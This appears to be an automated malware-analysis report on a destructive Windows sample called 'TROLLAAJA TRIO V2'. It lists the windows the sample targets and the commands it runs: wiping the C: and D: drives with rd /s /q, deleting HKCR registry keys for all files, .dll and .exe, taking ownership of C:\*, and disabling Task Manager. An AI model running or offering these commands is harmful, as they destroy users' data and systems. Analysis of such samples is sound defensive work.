Техническая информация
- '<SYSTEM32>\taskkill.exe' /F /IM hal.dll
- ClassName: '' WindowName: 'TROLLAAJA TRIO V2!'
- ClassName: '' WindowName: 'Windows Task Manager'
- ClassName: '' WindowName: 'Command Prompt'
- ClassName: '' WindowName: 'Registry Editor'
- ClassName: '' WindowName: 'Steam'
- ClassName: 'DDEMLMom' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c @echo off
- '<SYSTEM32>\reg.exe' delete HKCR/*
- '<SYSTEM32>\cmd.exe' /c reg delete HKCR/*
- '<SYSTEM32>\reg.exe' delete HKCR/.dll
- '<SYSTEM32>\cmd.exe' /c reg delete HKCR/.dll
- '<SYSTEM32>\reg.exe' delete HKCR/.exe
- '<SYSTEM32>\cmd.exe' /c reg delete HKCR/.exe
- '<SYSTEM32>\tskill.exe' hal.dll
- '<SYSTEM32>\cmd.exe' /c tskill hal.dll
- '<SYSTEM32>\cmd.exe' /c rd/s/q D:/
- '<SYSTEM32>\cmd.exe' /c cmd /c tskill hal.dll
- '<SYSTEM32>\cmd.exe' /c reg add HKCUTROLLAAJA TRIO
- '<SYSTEM32>\reg.exe' add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /f /d 1
- '<SYSTEM32>\cmd.exe' /c reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /f /d 1
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM hal.dll
- '<SYSTEM32>\takeown.exe' -f -s -q C:\*
- '<SYSTEM32>\cmd.exe' /c takeown -f -s -q C:\*
- '<SYSTEM32>\notepad.exe'
- '<SYSTEM32>\cmd.exe' /c color a
- '<SYSTEM32>\reg.exe' add HKCUTROLLAAJA TRIO
- '<SYSTEM32>\cmd.exe' /c rd/s/q C:\